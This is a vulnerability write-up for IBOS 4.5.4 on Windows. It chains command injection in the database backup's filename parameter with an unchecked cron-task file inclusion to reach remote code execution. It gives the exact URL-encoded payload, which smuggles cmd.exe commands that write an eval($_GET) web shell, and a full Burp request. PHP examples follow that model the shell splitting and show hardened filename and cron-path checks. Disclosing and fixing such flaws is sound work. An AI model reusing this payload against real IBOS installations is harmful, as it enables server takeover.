OS: Windows
IBOS version: IBOS 4.5.4 OPEN
The command injection reported at https://gitee.com/ibos/IBOS/issues/I18IIV (the "filename" parameter of the database backup is passed to the system shell) is used here to write a file into a directory of the attacker's choosing.
Step 1. Log in to the IBOS system, enter the management backend and open the database backup page.
Capture the backup request with Burp Suite, send it to "Repeater", and insert the payload into the value of the filename parameter.
The payload is shown below. Each URL-encoded %26 is an &, which cmd.exe treats as a command separator, so the injected cd and echo commands run after the backup command. The result is a file named "zzzzz" in /system/modules/recruit/cron:
%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa
The full request is:
POST /?r=dashboard/database/backup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/?r=dashboard/database/backup
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: P8Jm_saltkey=vpb6gmPE; PHPSESSID=3mcqdm2dr10tf3lb4cgpnl6ah5; P8Jm_sid=KmI412; P8Jm_autologin=1; P8Jm_lastactivity=1579248371; P8Jm_ulastactivity=480fKnWDRYWQhA5jDvpydR3bYm23jT9YOEmv%2FidCRP372M6FAptj
Upgrade-Insecure-Requests: 1
backuptype=custom&customtables%5B%5D=test_announcement&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2020-01-17_kRHRRgOk%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa&dbSubmit=1
Step 2. Open the scheduled task page and edit a task. The script name to use is the file created in step 1, "zzzzz".
In the edit form, set "Task script" to that name and submit.
Then run the script from the task page.
In Burp Suite's "Repeater", add the parameter "test" to the run request, for example test=phpinfo().
A system command such as ipconfig can be run the same way.
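To make step 1 concrete, here is an added example in PHP that is not IBOS code. The mysqldump line, the data\backup path and the .sql suffix are an assumed shape for a backup routine that shells out when method=shell is chosen; they are not the project's real code. The first function shows how the request's filename value turns into separate cmd.exe commands, the second shows the check the backup controller should apply instead.

```php
<?php
declare(strict_types=1);
// Added example, not IBOS code. The mysqldump line and the data\backup path
// are an ASSUMED shape for a backup routine that shells out with method=shell.

// The filename value from the request above, URL-decoded.
const INJECTED_FILENAME = '2020-01-17_kRHRRgOk&cd system&cd modules&cd recruit'
    . '&cd cron&echo eval($_GET["test"]);>>zzzzz&aaa';

// Hypothetical vulnerable assembly: the name is interpolated, unquoted, into
// a line that will be handed to cmd.exe.
function buildBackupCommandUnsafe(string $filename): string
{
    return 'mysqldump -u root ibos test_announcement > data\backup\\' . $filename . '.sql';
}

// How cmd.exe reads an unquoted '&': every piece is its own command.
// (Deliberately simplified: ignores quoting, && and ||.)
function cmdSegments(string $commandLine): array
{
    return array_map('trim', explode('&', $commandLine));
}

// Hardened: accept only the shape the application itself generates for the
// name (date prefix plus a short token), reject everything else, and still
// quote the argument rather than trusting the check alone.
function backupFilenameOrNull(string $filename): ?string
{
    return preg_match('/\A\d{4}-\d{2}-\d{2}_[A-Za-z0-9]{1,16}\z/', $filename) === 1
        ? $filename
        : null;
}

function buildBackupCommandSafe(string $filename): ?string
{
    $name = backupFilenameOrNull($filename);
    if ($name === null) {
        return null; // refuse the request; do not try to strip metacharacters
    }
    return 'mysqldump -u root ibos test_announcement > '
        . escapeshellarg('data\backup\\' . $name . '.sql');
}

// Demo: what the shell would execute for the injected value.
foreach (cmdSegments(buildBackupCommandUnsafe(INJECTED_FILENAME)) as $i => $segment) {
    printf("[%d] %s\n", $i, $segment);
}
var_dump(buildBackupCommandSafe(INJECTED_FILENAME));     // NULL: rejected
var_dump(buildBackupCommandSafe('2020-01-17_kRHRRgOk')); // string: accepted
```

Run with php on any platform; the splitting only models cmd.exe, it does not execute anything. Segments 1 to 5 are the attacker's cd and echo commands; the last segment comes out as aaa.sql, which is the likely reason the payload ends with &aaa: whatever the application appends after the name lands on that dummy command instead of on the redirect that writes zzzzz.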
The vulnerable file is /system/modules/dashboard/controllers/CronController.php, and the function in question is actionIndex(), starting at line 16.
Line 40 calls getRealCronFile(), which builds the complete file path; lines 41 to 47 contain the string filtering applied to the file name when a scheduled task is modified.
The code of getRealCronFile() was shown in a screenshot that is not included here.
In that code the directory and the base file name are constrained, but the file extension is not, so any file in that directory can be included; combined with another vulnerability that writes a file there (such as the one used in step 1), this yields a shell.
The function should only include files of a specific type (.php) from the specified directory, or a fixed set of named files.
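The fix suggested in the last sentence, as an added example in PHP that is not IBOS's code: the directory and the extension are fixed by the server, the task name is restricted to an identifier, and the resolved path is checked to still be inside the module's cron directory. The class and parameter names (CronFileResolver, modulesRoot) and the temporary-directory fixture are assumptions made for the demo; the constructor promotion needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);
// Added example, not IBOS code: a hardened stand-in for the path building
// done by getRealCronFile(). The class and parameter names are assumptions.

final class CronFileResolver
{
    public function __construct(private string $modulesRoot)
    {
    }

    // Returns the absolute path of an allowed task script, or null if the
    // request names anything other than a .php file in <module>/cron/.
    public function resolve(string $module, string $task): ?string
    {
        // 1. Both parts must be plain identifiers: no dots, slashes or NULs,
        //    so "../", "zzzzz" with no extension, or "x.php\0" never get through.
        if (preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $module) !== 1
            || preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $task) !== 1) {
            return null;
        }
        // 2. Directory and extension are chosen here, never taken from input.
        $dir = realpath($this->modulesRoot . DIRECTORY_SEPARATOR . $module
            . DIRECTORY_SEPARATOR . 'cron');
        if ($dir === false) {
            return null;
        }
        $file = realpath($dir . DIRECTORY_SEPARATOR . $task . '.php');
        // 3. Containment is re-checked on the canonical path, so a symlink
        //    inside cron/ pointing elsewhere is rejected too.
        if ($file === false || !is_file($file)
            || strncmp($file, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
            return null;
        }
        return $file;
    }
}

// Constructed fixture (throw-away temp tree): one real task script plus an
// extension-less file like the "zzzzz" the write-up drops into recruit/cron.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ibos_cron_demo_' . getmypid();
$cron = $root . DIRECTORY_SEPARATOR . 'recruit' . DIRECTORY_SEPARATOR . 'cron';
mkdir($cron, 0700, true);
file_put_contents($cron . DIRECTORY_SEPARATOR . 'update.php', "<?php // legitimate task\n");
file_put_contents($cron . DIRECTORY_SEPARATOR . 'zzzzz', 'eval($_GET["test"]);');

$resolver = new CronFileResolver($root);
$cases = ['update', 'zzzzz', 'zzzzz.php', '../../dashboard/cron/update', "update\0"];
foreach ($cases as $task) {
    printf("%-32s => %s\n", addcslashes($task, "\0"),
        $resolver->resolve('recruit', $task) ?? 'rejected');
}
// Only "update" resolves; every other case is rejected before any include.

// Tidy up the fixture.
unlink($cron . DIRECTORY_SEPARATOR . 'update.php');
unlink($cron . DIRECTORY_SEPARATOR . 'zzzzz');
rmdir($cron);
rmdir(dirname($cron));
rmdir($root);
```

The order of the checks matters: the identifier whitelist rejects the dropped "zzzzz" because the server, not the client, appends ".php", and the realpath containment check catches anything the regex did not anticipate (a symlink placed in cron/ by some other write primitive, for instance). Rejecting, rather than cleaning up, the task name is also what removes the "write a file, then include it" chain described above.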